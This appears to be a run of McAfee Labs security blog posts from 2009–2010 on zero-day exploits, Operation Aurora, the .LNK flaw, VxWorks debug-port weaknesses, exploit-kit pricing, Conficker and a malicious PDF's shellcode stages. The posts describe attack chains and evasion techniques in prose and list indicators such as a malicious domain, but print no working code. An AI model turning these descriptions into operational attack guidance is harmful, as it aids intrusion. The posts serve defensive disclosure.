Just after Adobe released their Out of Band patch for CVE-2010-2862, We discovered a malware exploiting a new 0-day vulnerability in the wild. Similar to the iOS PDF jailbreak vulnerability and CVE-2010-2862, this 0day vulnerability also occurs while Adobe Reader is parsing TrueType Fonts. We’ve analyzed and confirmed that the vulnerability affects the latest Adobe Reader (v9.3.4).

This 0day vulnerability is a typical stack buffer overflow vulnerability and exploitation of this issue is expected to be relatively easy. Although the latest version of Adobe Reader has been compiled with stack protection (/GS), the exploit uses an Return Oriented Exploitation (ROP) technique to bypass /GS protection and DEP.

We saw a similar technique used to exploit an older Adobe TIFF parsing vulnerability. All this seems to point to the fact that ROP is gaining wider acceptance by malware writers to bypass DEP and existing stack protections.

McAfee Labs is coordinating with Adobe PSIRT currently and we’ve provided them with additional details on the bug. The Adobe team is actively working on this issue. There is no patch available at the time of writing this blog. Adobe Acrobat users are urged to update their security definitions for the various products.

McAfee protection to date:

• McAfee Network Security Platform: Coverage provided under the signature 0×40293c00, UDS-HTTP: Adobe Reader Unspecified Buffer Overflow
• DAT files: Coverage for known exploits provided in the 6099 DAT release under the signature Exploit-PDF.ps.gen
• Host IPS: Generic Buffer Overflow protection provides partial coverage
• FoundStone: The FSL package of September 8 includes a vulnerability check to assess if your systems are at risk

The Anti-Malware engine is a critical and core piece of the McAfee anti-malware solutions. As with any core technology, the engine must be rock-solid stable, fast, and functionally rich.

A new McAfee Labs whitepaper outlines these engine technologies and values, covering both endpoint and gateway uses. Beyond introductions to malware detection methodologies–ranging from exact detection to heuristics, and technologies from exploit detection to cloud-based detection, the new paper especially outlines McAfee’s approach to Cooperative Anti-Malware on Endpoint and Gateway. “Cooperative” in this case refers to the added value of combining anti-malware on the endpoint and on the gateway: a true defense-in-depth strategy in action.

In this defense-in-depth implementation we have engine technologies that are optimized for the endpoint and the gateway, respectively, and both are connected through our Global Threat Intelligence back-end, or “cloud.” This combination allows strict enforcement and the highest proactive catch rates at the network perimeter, keeping the majority of threats outside of your network, and effectively and accurately protecting the desktops in an enterprise as well.

Download and read it now!

Recently the US-Cert issued two security bulletins (VU#362332 and VU#840249) about weaknesses in Wind River Systems VxWorks embedded operating system. VxWorks is one of the most popular operating systems that runs on a variety of appliances and devices. Some of these appliances are part of the critical infrastructure in an organization, such as routers and firewalls. An attacker could fully control vulnerable embedded devices by remotely exploiting these two vulnerabilities.

The first bulletin (VU#362332) contains old and well-known issues (CVE-2005-3715, CVE-2005-3804, CVE-2006-0374) on the VxWorks WDB debugging interface. WDB connects host tools to a VxWorks system during development and it is enabled by default. The vulnerability allows any unsolicited requests to access WDB without authentication using the SUN RPC protocol over UDP port 17185.

The second bulletin (VU#840249) addresses exploits that target VxWorks self-designed hashing algorithm used to store passwords in the VxWorks operating system. VxWorks standard hashing algorithm is susceptible to hash collision attacks, which allow attackers to brute-force the password in a relatively short time.

Combing these weaknesses and exploiting them together, an attacker can fully compromise the device. Here is an example of a typical exploit: First, an attacker can scan for an embedded device with VxWorks WDB debug service enabled by exploiting the unauthenticated access vulnerability as detailed in VU#362332. Once the device is found, an attacker can use the debug interface to find the username and password information stored on the device. Using that information, the attacker can then brute-force the password offline by exploiting the second weakness (VU#840249).

Today, McAfee NSP released a UDS (0×40805600/ UDS-RPC: Wind River Systems VxWorks WDB Debug Activities Detected) that provides coverage for CVE-2005-3715, CVE-2005-3804, CVE-2006-0374, and VU#362332. Please note that it is normal for embedded platforms to have remote debugging enabled in a development environment. The VxWorks WDB debug activities may be legitimate; if that is the case, you can ignore the alerts. However, if users see any attempts from unknown or unexpected IP addresses, we recommend that users investigate the activity and take further action if required.

As McAfee Labs predicted in a previous blog post regarding the Microsoft Windows Shell .LNK vulnerability, it was just a matter of time before malware started using Exploit-CVE2010-2568 to take advantage of this new Microsoft zero-day flaw. The flaw is described in CVE-2010-2568.

First, there was talk about PWS-Zbot (a.k.a. Zeus) using the vulnerability in encrypted emails that contained the malicious .LNK file(s); then our research team found a new variant of Downloader-CJX that extended its previous .LNK propagation strategy using social engineering with the new Exploit-CVE2010-2568 .LNK files.

Downloader-CJX is a malware family that installs .LNK files mimicking current Windows and user folders such as Music, Documents, or New Folder. The malware changes the attributes of the real folder to hide it from Explorer, and drops the .LNK files with folder icons, so the user is lured into clicking on these malicious links that appear as legitimate folders. These .LNK files are detected as Downloader-CJX!lnk when found in an infected machine.

The new variant drops additional files on infected systems:

The file x.exe is another copy of Downloader-CJX that in turn drops xxx.dll, a DLL component of Downloader-CJX.

The additional .LNK files exploit the CVE-2010-2568 vulnerability, enabling the malware to load the DLL file when users browse the folder.

These .LNK files are already detected as Exploit-CVE-2010-2568 and the new Downloader-CJX variant as Downloader-CJX.gen.g.

We offer you yet another reminder to keep your anti-malware software updated with the latest DATs, because the bad guys are always updating their software, too.

Today Microsoft updated the security advisory that was initially published last Friday (July 16), stating that they’re working on issuing a security patch for this vulnerability. Earlier, malware exploiting this issue was found in the wild. Researchers at McAfee Labs have been busy tracking this issue over the weekend and we have come up with some more quick Q&A’s.

1. What is the issue with .LNK files and how can it be exploited?
A. McAfee Labs researchers analyzed malware that was exploiting a design flaw in parsing shortcut (.LNK) files. This issue gets triggered because the Windows Shell component does not validate parameters sent out in the shortcut. This issue can be exploited via any mechanism that makes the user load the icon of the .LNK file.

2. Does the malware need a payload (shellcode) to exploit this flaw?
A. Since this is a design issue in the way shortcuts are parsed, no malicious payload (shellcode) is required to exploit this flaw. The .LNK file needs to point to a malicious file, the path of which needs to be hardcoded in the shortcut.

3. What are the requirements to successfully exploit this flaw?
A. This flaw can be triggered when Windows Explorer or Internet Explorer tries to render a malformed .LNK file that points to a malicious executable. The user need not double-click on the .LNK file to trigger the vulnerability; just opening the folder containing the malicious shortcut is enough to get infected.

4. What are the most likely attack vectors used to exploit this vulnerability?
A. USB drives are likely to be affected the most. The malware discovered in the wild was exploiting this issue via a USB drive. File sharing over SMB is another likely vector to exploit this flaw and this can lead to widespread malware infections over internal networks. WebDAV shares are equally susceptible to exploitation.

5. What are the affected platforms?
A. Microsoft has acknowledged that all supported platforms are affected. More details are available in the Microsoft security advisory. Windows XP SP2 is not listed in the list of affected platforms from Microsoft, so there is a chance of Windows XP SP2 users might remain vulnerable.

6. How widely is the issue being exploited?
A. The issue is known to be exploited by malware in the wild. Initial attacks were limited. However, an exploit module in metasploit was published today that uses WebDAV shares as an exploit vector. We expect wider exploitation of this issue. Users should keep their anti-virus software updated with the latest DATs (signatures).

We’ll keep our readers updated on this issue as we analyze more malware and techniques used by malware writers to exploit this flaw.

The news that Google is supposedly dropping Microsoft Windows is spreading like wildfire all over the Internet today. Without getting into any “which OS is better or more secure” holy war, let’s review some facts to see if this “decision” has any basis in reality. (I caution readers to remember this is not confirmed, even if it is true.)

The supposed cause of this change is Operation Aurora, the attack that affected Google and many other companies. From the McAfee Labs Threat Center:

“Operation Aurora was a coordinated attack which included a piece of computer code that exploits the Microsoft Internet Explorer vulnerability to gain access to computer systems. This exploit is then extended to download and activate malware within the systems. The attack, which was initiated surreptitiously when targeted users accessed a malicious web page (likely because they believed it to be reputable), ultimately connected those computer systems to a remote server. That connection was used to steal company intellectual property and, according to Google, additionally gain access to user accounts.”

What many people fail to realize is that Operation Aurora was not really about any technical issues.

But you may ask “Marcus, how can you possibly say that? Have you gone mad? Aurora 0wned multiple computers on multiple networks! They were all running that evil Microsoft Windows. Surely removing Windows will solve all the problems!”

These objections are not even close to the real issue. Sure, the attackers used a very effective zero-day vulnerability. And, certainly, they used lots of evasion techniques in delivering the payload? But the real vulnerability has not been discussed.

People were the weak link.

The attackers who launched Operation Aurora knew their targets well from both corporate and personal viewpoints. They knew what their victims were running and what their roles were. The attackers even knew what application versions they used. (Ever wonder why the zero-day was limited in effectiveness to Internet Explorer Version 6 when the attack commenced? The attackers knew that was all they needed.)

The intel that the attackers gathered to make Operation Aurora work is what made it a success–not the operating system involved. The targets were the people.

Would it make any difference if the victims were running Linux or any other operating system if an attacker builds such a sophisticated profile? Not remotely. Linux, Windows, Mac, whatever–everything has weaknesses. Especially the users of those systems.

When an attacker knows the details of a company’s technical deployment and personnel to the level we saw in Operation Aurora, the difference between one operating system and another is irrelevant. Any system or network can be technically compromised. Likewise, malware can be written for any operating system.

If determined attackers and gatherers of intelligence invest the time to get to know their targets–their behaviors, likes, dislikes, technical backgrounds, job roles, etc.–the actual exploit is trivial. All they have to do is get their victims to click a link. The more they know about their targets, the more likely users will click it.

Social engineering and intelligence gathering trumps technology every time. It always has and always will.

Today’s cybercriminals frequently use “exploit packs” to easily snare victims for their botnets. Users with underprotected computers who visit booby-trapped websites become the latest botnet zombies. I often receive requests asking me which exploit packs are current and which vulnerabilities they use.

To answer these inquiries, I’ve created a table that lists the exploits referenced by their Common Vulnerabilities & Exposures (CVE) names and their related kits. (Click on the image to enlarge it.)

Looking at this table, we can see that the most up-to-date kit is Crimepack.
Version 3.0 alpha is in the wild. In March 2010, Version 2.2.1 was offered for $400.

Next is the Phoenix Exploit Kit. Its price was around $400 in November 2009.

The Eleonore exploit pack is another popular tool. It was recently in the news after the hack of the United States Treasury website. In February 2010, Version 1.3.2 sold for $1,200. In July 2009, the Version 1.2 went for $700 plus $50 for an encrypter. For $1,500, buyers received a version allowing them to manage the tool through their own domains.

Next we have Fragus ($800), Yes Exploit Kit, and Siberia. In April 2010, the Yes Exploit Kit Standard Edition sold for $900. For an additional $250, buyers could include an “abuse-immunity” Virtual Private Server for one month and two “abuse-immunity” domains.

In the final four columns you’ll find the oldest common tools, offered from 2006 to 2008: El Fiesta, Icepack, MPack. and WebAttacker.

I was just reading Byron Acohido’s writeup on Microsoft ending security support for patches for Windows XP Service Pack 2 and Windows 2000. Now as I work for a vendor myself I completely understand why Microsoft is going EOL (or is it EOS for end-of-support?? I forget…) for these operating systems – better, more robust OS choices exist and no company has unlimited resources to support application and technologies that have seen better days.

I get that, I really do. I do, however, think some larger issues certainly loom:

1. Legacy applications that will not run on higher patch builds
2. Point-of-Sale and embedded devices (think ATM’s an such….) ESPECIALLY if you have a global deployment
3. Patching and upgrading is never easy anyway
4. The agility of cybercriminals

Now I will also concede that its relatively straightforward to compromise a fully patched system. The tools and techniques are readily and easily available if you have a browser and even limited Google search skills – but let’s also be honest: its WAY easier to own an older unpatched build especially when all the vulnerabilities that XP Service Pack 2 and Windows 2000 have are so well documented and available. Malware also tends to be fairly backwards compatible in many cases.

I am not so certain this will cause a great shift in toolkits or focus of your average malware writer or cybercriminal. I DO think it is an excellent opportunity for scammers tho. Just think of the spam campaigns or link spam possibilities – its a great lure.

“MS has stopped support for XP Service Pack 2 click here for low cost upgrades!!!”
“Your machine seems to be running Windows 2000. Click here to upgrade to Windows 7 for a low price.!”

I can see the spam runs, phishing sites and associated fake-av installs now… Be forewarned my friends. And is it just me or is whitelisting and application control looking better and better??

All over the world, individuals and many organized crime and mafia groups have found that the Internet can help them make a lot of money. Others are motivated by ideology: Manipulated by or acting in accordance with an ethos, they conduct illegal activities against institutions or individuals they consider the “enemy.” Far removed from the isolated individuals acting simply irresponsibly or for amusement, these two groups constitute the double threat we know today as cybercrime and hacktivism.

Last week we published a new report that looks, in great depth, at this phenomenon. The main goal is to explain how these organized groups have become established and what the extent of their activities are. In the first part of this report, after offering some definitions, we present some of the major participants who simply cannot be ignored. The second part deals with various topics including cybercrime and hacktivism, economics, politics, culture, and others. Each topic is illustrated with examples found in the news. Through other examples, the third part of the document deals with prices and the return on investment criminals can expect.

Chinese, Japanese, and Brazilian Portuguese versions are also available from the McAfee Labs Technical White Papers web page.

Earlier today, Microsoft released Security Advisory (981374). This advisory covers CVE-2010-0806, an unpatched vulnerability affecting Internet Explorer versions 6 and 7. This attack appears to be rather targeted at the moment, but as with other unpatched vulnerabilities in the past, this has the potential to explode now that the word is getting out.

McAfee Labs is aware of an attack emanating from the domain topix21century.com (over both http and https). In this attack, vulnerable users are directed to a malicious webpage that downloads and executes a file named notes.exe or svohost.exe (classified as BackDoor-EMN) in drive-by download fashion (visiting the page is enough to get infected). There are multiple variants of this trojan involved. Notes.exe creates two copies of itself in the %temp% directory, and drops a DLL file. This DLL file is injected into Internet Explorer and provides remote access to an attacker.

The backdoor allows an attacker to perform various functions on the compromised system, including uploading & downloading files, executing files, and terminating running processes. Infected systems may attempt to communicate with the domain notes.topix21century.com over https.

File names related to this attack include:

• 20100307.htm (CVE-2010-0806 exploit)
• bypasskav.txt (part of exploit obfuscation code)
  • notes.exe (backdoor installer)
    • note.exe (backdoor installer copy)
    • clipsvc.exe (backdoor installer copy)
      • wshipl.dll (backdoor)
    • rsvm.exe (backdoor installer)
      • wshipnotes.dll (backdoor)

Preliminary product coverage is as follows:

• McAfee DAT files (antivirus): Coverage will be provided for known exploits as Exploit-CVE-2010-0806 and known payloads as BackDoor-EMN in the 5916 DAT files, releasing March 10.
• McAfee VirusScan Enterprise Buffer Overflow Protection: Generic Buffer Overflow Protection is expected to cover future exploits.
• McAfee Host Intrusion Prevention: Generic Buffer Overflow Protection is expected to cover future exploits.
• McAfee Network Security Platform: The sigset releasing March 9 contains coverage under the signature “HTTP: Microsoft Internet Explorer Code Execution Vulnerability”.
• McAfee Vulnerability Manager: The FSL/MVM package of March 9 includes a vulnerability check to assess if your systems are at risk.
• McAfee Web Gateway (formerly Webwasher): TrustedSource has coverage for domains and IP addresses that the malware contacts.
• McAfee Firewall Enterprise (formerly Sidewinder): TrustedSource has coverage for domains and IP addresses that the malware contacts.
• McAfee SiteAdvisor, SiteAdvisor Plus, SiteAdvisor Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts.

McAfee Labs is investigating this attack further and will continue to monitor any related activity closely.

Today we unveiled our Threats Report for the fourth quarter of 2009. It highlights many of the most significant spam-generating stories in 2009 as well as the rise of political hacktivism in countries such as Poland, Latvia, Denmark, and Switzerland. The report’s findings also reveal that 2009 averaged approximately 135.5 billion spam messages per day; yet spam volume decreased by 24 percent in Q4 compared with Q3.

Spammers piggybacked heavily on leading headlines in 2009, taking advantage of breaking news stories, global tragedies, and other timely events. The Air France plane crash and Michael Jackson’s death were among the top tragedies exploited by spammers last year. McAfee researchers also noted a significant number of 2010 FIFA World Cup-themed phishing scams, Zeus Trojans masked as the CDC and referencing the H1N1 vaccine program, and “get rich quick” scams due to the rise of U.S. unemployment levels.

Politically motivated attacks are on the rise around the world, targeting popular social networking destinations, as seen recently with the Iranian Cyber Army’s political attack aimed at Twitter. The report confirms that the United States is not the sole target, nor is China the sole origin for these types of assaults. Recent political attacks targeted the Polish government, the Copenhagen Climate Conference, and Latvia’s Independence Day.

Malware–including fake security software, attacks on social networks, and AutoRun USB infections–continued to rise significantly last year. Internet-based, Web 2.0-centric attacks and threats on portable storage devices played a huge role in 2009, contributing greatly to the immense increase in threats and demonstrating how the nature of computer threats are evolving over time. Cybercriminals used social networking sites to target a new generation of victims, with Koobface activity increasing considerably during the latter part of 2009. Koobface is now hosted by servers in 46 countries, with the United States, Germany, and Denmark making up the top three hosting locations.

China Overtakes the U.S. as No. 1 Country Producing Zombies

Zombie production in the U.S. dropped significantly, from 13.1 percent in Q3 to 9.5 percent in Q4, making China the top Zombie-producing country at 12 percent. Brazil ranked third, with Russia and Germany rounding out the top five countries. The United States still remains the number one country in spam production, with Brazil and India taking the number two and three spots. Ukraine and Germany joined the list of top 10 countries producing spam for the first time in 2009.

The Geographic Distribution of Web Threats

North America is the worldwide leader in hosting malicious content, with Europe/Middle East/Africa second, followed by Asia/Pacific. In Europe, Germany holds the number one spot, followed by the Netherlands and Italy. China is the chief host for malicious content in Asia, followed by Russia and South Korea. South America is beginning to play a larger role, with Brazil as the top hosting country in that region.

China is the Worldwide Leader in SQL-Injection Attacks

Although SQL-injection attacks originate from a number of countries across the globe, China was by far the number one country hosting these assaults, at 54.4 percent. Due to the growing popularity of Adobe applications, McAfee Labs saw a number of client-targeted attack attempts to exploit Flash and Acrobat reader.

A full copy of the Q4 2009 Threats Report is available here.

Operation Aurora has received a lot of attention over the past couple of days.  To recap, Google, Adobe, and many other companies were attacked with code exploiting a zero-day vulnerability in Internet Explorer.  Since the announcement of this vulnerability (CVE-2010-0249), exploit code has been made public and already revised into a more usable form.

History tells us that when exploit code targeting an unpatched vulnerability in popular software is release; a slew of attackers are ready, willing, and able to capitalize.  What started out as a sophisticated targeted attack is likely to lead to large-scale attacks on vulnerable Microsoft Internet Explorer users.  This often takes the form of drive-by download sites serving malware to unsuspecting users, lured by links spammed in email, social networking sites, blogs, and poisoned search engine results.

For more information on this vulnerability, the Operation Aurora attack, and ways to protect your environment see:
More Details on “Operation Aurora”

Earlier today, George Kurtz posted an entry, ‘Operation “Aurora” Hit Google, Others’,  on the McAfee’s Security Insight blog  The purpose of this blog is to answer questions about this particular attack; fill in some of the threat flow and McAfee coverage details.

How were systems compromised?
When a user manually loaded/navigated to a malicious web page from a vulnerable Microsoft Windows system, JavaScript code exploited a zero-day vulnerability in Internet Explorer;  Microsoft Internet Explorer DOM Operation Memory Corruption Vulnerability.  Microsoft has released Security Advisory (979352) for this vulnerability (CVE-2010-0249).

What was the payload of the exploit?
Once a system was successfully compromised, the exploit was designed to download and run an executable from a site, which has since been taken offline.  That executable installed a remote access Trojan to load at startup.  This Trojan also contacted a remote server.  This allowed remote attackers to view, create, and modify information on the compromised system.

How wide-spread is this attack?
Aurora appears to have been a very concentrated attack on specific targets.  It is not believed to be widespread at this time.

How serious is this vulnerability?
The Microsoft Internet Explorer vulnerability leveraged in this attack allows for remote code execution, but does require user intervention (such as following a hyperlink to a website, or opening an email attachment, etc).  Furthermore, the single exploit known to exist can be thwarted by Data Execution Prevention (DEP), enabled by default in Internet Explorer 8 and optionally in Internet Explorer 7.  Microsoft lists the following combinations to be vulnerable: Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4, and Internet Explorer 6, Internet Explorer 7 and Internet Explorer 8 on supported editions of Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2 are affected.

How are McAfee customers protected from this attack?
McAfee DAT files (antivirus): Coverage will be provided for associated malware (as Exploit-Comele, Roarur.dr, and Roarur.dll in the 5862 DATs, releasing January 15. Partial coverage is provided in the current (5861) DATs for some components as Generic.dx!kwv, Generic Spy.e, Spy-Agent.ey, and Exploit-Comele.

McAfee VirusScan Enterprise Buffer Overflow Protection: Generic Buffer Overflow Protection is expected to cover some, but not all, exploits.

McAfee Host Intrusion Prevention: Generic Buffer Overflow Protection is expected to cover some, but not all, exploits.

McAfee Network Security Platform: The UDS release of January 14 contains the signature “UDS-HTTP: Microsoft Internet Explorer HTML DOM Memory Corruption” which provides coverage.

McAfee Vulnerability Manager: The FSL/MVM package of January 14 includes a vulnerability check to assess if your systems are at risk.

Updated Jan 14
McAfee Web Gateway (formerly Webwasher): TrustedSource has coverage for domains and IP addresses that the malware contacts and coverage for associated malware was released January 15 (as BehavesLike.JS.Obfuscated.E“), proactive coverage existed for some components (as Trojan.Crypt.XDR.Gen).

Updated Jan 16
McAfee Firewall Enterprise (formerly Sidewinder): TrustedSource has coverage for domains and IP addresses that the malware contacts and coverage for associated malware was released January 15 (as BehavesLike.JS.Obfuscated.E“), proactive coverage existed for some components (as Trojan.Crypt.XDR.Gen).

Updated Jan 18
McAfee Network Security Platform: Extended coverage is provided in the January 18 UDS release via the “Microsoft Internet Explorer HTML DOM Memory Corruption III” signature. Coverage was originally provided in the UDS release of January 14.

McAfee Application Control: All versions of McAfee Application Control protect against infection, without updates, and will prevent all versions of the “Aurora” attack witnessed to date.

McAfee Firewall Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts. The embedded McAfee AV scanning engine in Firewall Enterprise version 7.0.1.02 and later provides coverage for supported protocols via standard McAfee DAT updates. Coverage for known exploits and associated malware is provided as Exploit-Comele, Roarur.dr, and Roarur.dll in the 5862 DATs, released January 15.

McAfee SiteAdvisor, SiteAdvisor Plus, SiteAdvisor Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts.

Updated coverage information will be communicated through McAfee Security Advisories:
http://www.mcafee.com/us/threat_center/securityadvisory/signup.aspx

Day 2 and Night 2 of the 26th Chaos Communication Congress is over, so it’s time for a short update on what you are missing here.

This year the Congress is organized as a distributed event: Many local Hacker Spaces have joined the network at Berlin Conference Center, giving access to resources and talks to visitors. Check out the Dragons Everywhere Wiki at 26c3 for more info. And of course there are still the live streams of the talks available.

One highlight was certainly an update of the current debate around the Vorratsdatenspeicherung (“data retention”). CCC-spokesperson Constanze Kurz expects a favorable ruling against the current laws by the highest German court. This may have an EU-wide impact.

At the same time (and thank goodness there were streams available!) was Collin Mulliner’s talk about fuzzing smart phones and some of his (and Charlie Miller’s) findings.

Felix ”FX” Lindner changed sides: In a talk covering defense instead of breaking things, he demonstrated the security problems that come with Flash and released a tool for sandboxing .swf files to prevent a class of Flash exploits called Blitzableiter (“lightning rod”). His tool is still work in progress but looks very promising already.

And to finish the day there was the Phonoelit Party at c-base, featuring Mumpi, Vela, and Illo. Another great event!

Of course, this selection is just my personal preference. Make sure to check the schedule for talks that interest you.

Yesterday, my colleague Dave Marcus quoted for you the new graphs and stats posted by Shadowserver. Indeed, since November 2008, W32/Conficker (alias Downup, Downadup, Kido) has frequently made headlines. This computer worm has five main variants, which have appeared during the last year. Wikipedia lists the dates: 

• A variant: First appeared 21 November 2008
• B variant: First appeared 29 December 2008
• C variant: First appeared 20 February 2009
• D variant: First appeared 4 March 2009
• E variant: First appeared 7 April 2009  (self-destruction on 3 May 2009)

W32/Conficker spreads via Windows AutoRun feature, drive sharing, and Microsoft vulnerabilities. At the end of 2008, the A and B versions took advantage of a newly discovered Window’s Remote Procedure Call service vulnerability (MS08-067). That’s how Conficker’s masters created a large botnet involving one million unique IPs on a daily basis. The worm used a date-based algorithm to generate 250 domains per day under the generic top-level domain standard. Then infected machines attempted to contact one of these domains in order to install specific malware.

In a similar manner, hosts infected with the C variant generated 50,000 unique URLs ending with a country-code top-level domain and attempted to connect to the first URL that was ready to distribute a digitally signed payload. This third variant also contained peer-to-peer functionality.

The D and E variants were not so prolific; they helped spread the C version as well as other malware (W32/Waledec) and fake anti-virus software.

Estimating the size of the Conficker population is almost impossible. In January, a 10-million hosts figure was frequently quoted in the media. McAfee announced one million unique IPs were alive (or online) each 24 hours, while another security company claimed that at least one out of every 16 PCs worldwide were infected. In March another source said that more than 35 million unique IPs had been botnet zombies since November 2008.

Today the A, B, and C variants maintain a huge foothold worldwide. In October, researchers estimated the number of systems infected topped seven million. Following Dave’s advice, I visited the new Shadowserver statistics page. To illustrate the extent of how this malware affects the world, the organization monitored the Autonomous System Number blocks that have at least one Conficker IP in their network space. The charts highlight the widespread infection and propagation as well as the ratio of infected IP addresses for each autonomous system block.

Shadowserver names 183 country codes and 5994 autonomous systems with Conficker IP in their network space:

• 1086 for the Russian Federation (RU)
• 597 for the United States (US)
• 422 for Ukraine (UA)
• 271 for Romania (RO)
• 244 for Brazil (BR)
• 243 for Republic of Korea (KR)
• 184 for Poland (PL)
• 166 for Bulgaria (BG)
• 147 for Europe (EU)
• 129 for Indonesia (ID)
• 113 for Japan (JP)
• 95 for China (CN)
• 94 for India (IN)

You can also find a Top 500 list for the autonomous systems hosting the largest number of infected IPs as well as the percentage of their entire routed space that is affected by the worm. CHINANET and CHINA169 take the top positions, but with only 1.1 percent and 1.2 percent of unique aggregate IPs. In the 420th position, we discover that 26.36 percent of CHILE S.A.’s routed space is affected by the worm.

If you want to know how your autonomous systems or your country-code top-level domain are positioned, check out the Shadowcrew website.

We don’t really know the objectives of Conficker attacks, even though we can guess the motivations are financial. The consensus in the security community is that it was created to make botnets for hire. The botnet can be rented to criminals who want to send spam, distribute rogue spyware products, steal credentials, and direct users to online scams and phishing sites.

In May, Mike Steward from the Canadian Internet Registration Authority suggested that in the worst case Conficker could become a powerful weapon for causing cyberwarfare that could disrupt not just countries, but the Internet itself.

Our good friends at Shadowserver have recently added some excellent graphs and stats that highlight the continued infections and propagation by the Conficker worm.

Conficker, although it actually does very little, continues to be a major annoyance worldwide, so let’s use these excellent charts and graphs as a reason to revisit two important points:

• Update your systems to current patch levels
• Use up-to-date and properly configured security software. Deploy these at a variety of levels whenever possible. (Layers of defense work better than a single solution.)

Take these two steps and you will be protected against Conficker and a whole lot more. Threats are complex, and combating them really does take layers of defense along with appropriate security technologies. In this age of “blended” and “Web 2.0″ threats, it is wise to incorporate host IPS, network IPS, reputational technologies, and cloud technologies.

The bad guys are always looking for new ways to make their malware and attacks more successful. The good news is we are always working on new technologies to make them less successful.

Adobe just posted a new Security Advisory (APSA09-07, CVE-2009-4324) for the latest critical vulnerability in Adobe Reader and Acrobat 9.2 (and earlier). The flaw lies within a JavaScript function specific to the PDF Reader. Adobe plans to release a patch by January 12, 2010, to resolve the issue. The zero day is already being exploited in targeted attacks. A Twitter post indicates that an exploit module was added to the MetaSploit framework, as well; so it’s only a matter of days until this exploit will become widespread–as the various exploit toolkits are “enhanced” with support for this latest vulnerability.

The screenshot below illustrates the inner workings of one such malicious PDF file, showing the JavaScript obfuscation layer on top of the actual exploit code.

McAfee customers are protected through both the DATs (as “Exploit-PDF.ag” in 5834) and through Gateway Anti-Malware (“BehavesLike.PDF.Suspicious.Z”). If you don’t really need JavaScript in PDF documents (and if you do, please leave a comment to this blog–we’re curious to know), you can mitigate this issue until the patch is available next year by disabling JavaScript in Adobe Reader and Acrobat as described in the Adobe Security Advisory.

McAfee Labs has observed various spam runs exploiting the recent sensational Carrie Prejean news. The Prejean video is rapidly becoming one of the most searched-for topics ever on the net since the existence of the tape became common knowledge.

Source: Google Trends

Java applets provide everything from interactive features to web applications to advertisements. Since the birth of Java, attackers have exploited its security platform. Attackers are now taking advantage of a feature in Java to social-engineer not tech-savvy Internet users into infecting themselves with malware.

Here’s how an attack works:

• The bad guys spam a link claiming to be the Carrie PreJean video
• Then they trick victims into visiting a malicious website, which prompts users into running a Java applet to view the video

The signed applet contains a signature that browsers should verify through a remote, independent certificate-authority server. Once the signature is verified and the user also approves, the signed applet can gain more rights, becoming equivalent to an ordinary application. When the app is injected into a trusted website, users would hardly take the trouble to validate if the certificate is legitimate.

• At this point, the applet runs in the browser, which in turn downloads a malicious executable that launches itself on the victim’s machine

This approach is very effective for the following reasons:

• It’s easier to social-engineer users, as many rich multimedia applications use Java
• Unlike spammed links that contain a cocktail of exploits or a zero-day attack, this approach exploits the applet’s design
• The attack is independent of browser type and version
• The attack works on a machine with the latest version of Java, which makes the exploit all the more dangerous

The malicious applet has almost no detection on Virustotal, but it is detected by McAfee with the current DATS as Exploit-ByteVerify.b. The malicious executable incorporates SMTP functionality that is capable of sending spam and is currently detected as BackDoor-EHP.

We urge users to handle unknown Java applets with caution and make sure any digital signature comes from a trusted authority before executing it.

Client-side exploitation continues to be a popular attack vector. Another zero-day attack has targeted Adobe Acrobat Reader to infiltrate customer networks. The currently unpatched exploit opens the door to code execution when a victim simply reads a malicious PDF document.

This JavaScript code is viewable only if the stream had been unpacked, as can be seen in this FileInsight screenshot:

Although the content of the compressed stream may look like random data, when unpacked the JavaScript code will fill a certain memory area with malicious x86 assembly code and cause the exploited Adobe software to execute this shellcode–commonly know as a heap spray.

To determine the final intent of the shellcode, we have to remove another obfuscation layer that attempts to evade automated detection. The machine code is embedded as a “malformed” and “escaped” sequence of hex bytes. Any occurrence of the substring “XX” is replaced with “%u” before JavaScript can convert the string back into binary, executable code.

After loading it into a disassembler, we can see that the unescaped executable code is stage one of a two-stage attack. The intent of stage one is to identify the open file handle of the malicious PDF to find a particular signature (which is called an egg by exploit writers). This signature (0×0A666F65 in this example) is immediately followed by stage two of the shellcode and is then branched into.

The screenshot below shows the presence of the PDF’s embedded egg, followed by x86 machine code, part of stage 2. The code contains another obfuscation layer, namely a routine that XOR decodes the remaining code and–surprise, surprise–unveils an embedded executable!

The hidden executable, which is visible only in a hex editor after having applied the same XOR decoding, is written to disk and executed by the shellcode–thus highlighting the steps the attacker has taken to evade detection.

McAfee Gateway Anti-Malware detected and blocked this threat proactively (“BehavesLike.PDF.Suspicious” and the embedded executable as “BehavesLike.Win32.Rootkit.H”). McAfee Artemis and the 5766 DATs block it, as well.

<<<<<<<<<< Update Late October, 13, 2009 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Adobe has released a patch that remediates the above issue. Full details available here.

Surrounded by a network of neon lights across the ceiling, walls of computer screens lit with grave headlines regarding our country’s digital dependence–drinking water, sewer systems, banks, government systems, all vulnerable to an electrical grid outage–I introduced my wife and my sixteen-year-old daughter to our latest McAfee endeavor, an exhibit contributor in the new International Spy Museum exhibit “Weapons of Mass Disruption.”

Yes, you read that correctly. Your humble narrator is part of a museum exhibit.

Nestled on the corner of 8th and F Streets in Washington, D.C., the International Spy Museum has become a must-see in our nation’s capital. It speaks to our country’s tales of espionage and the ultimate currency, intelligence. Never has a place been better suited to educate its visitors about the cybersecurity threats facing our government, our businesses, and you and me.

As former national intelligence director Admiral Michael McConnell mentioned during the exhibit’s opening event, the Internet has created an unprecedented level of vulnerability.

These threats, which could bowl you over in their magnitude and frequency, are constantly evolving, morphing into ever-changing but equally lethal pieces of malware–as diverse and fluid as Web 2.0 itself. In that stuff is our office, littered with Red Bull and Twinkies, where I and many other McAfee Labs researchers garner an understanding of the dark side of cyberspace activity. You know the saying: Keep your friends close but your enemies closer. It is this insight that yields information on breaking threats and a more holistic understanding of the black-hatted enemy.

So consider again the computer wall’s grave headlines in the exhibit: “The Pentagon’s IT system is probed 360 million times a day. Twitter crashed as a result of a denial of service attack against a Georgian proponent. Is our air traffic control system protected?”

The exhibit shouts the theme that we as an industry live and that I shared during my contribution interview. The threat is real. Even my daughter got a kick out of it.

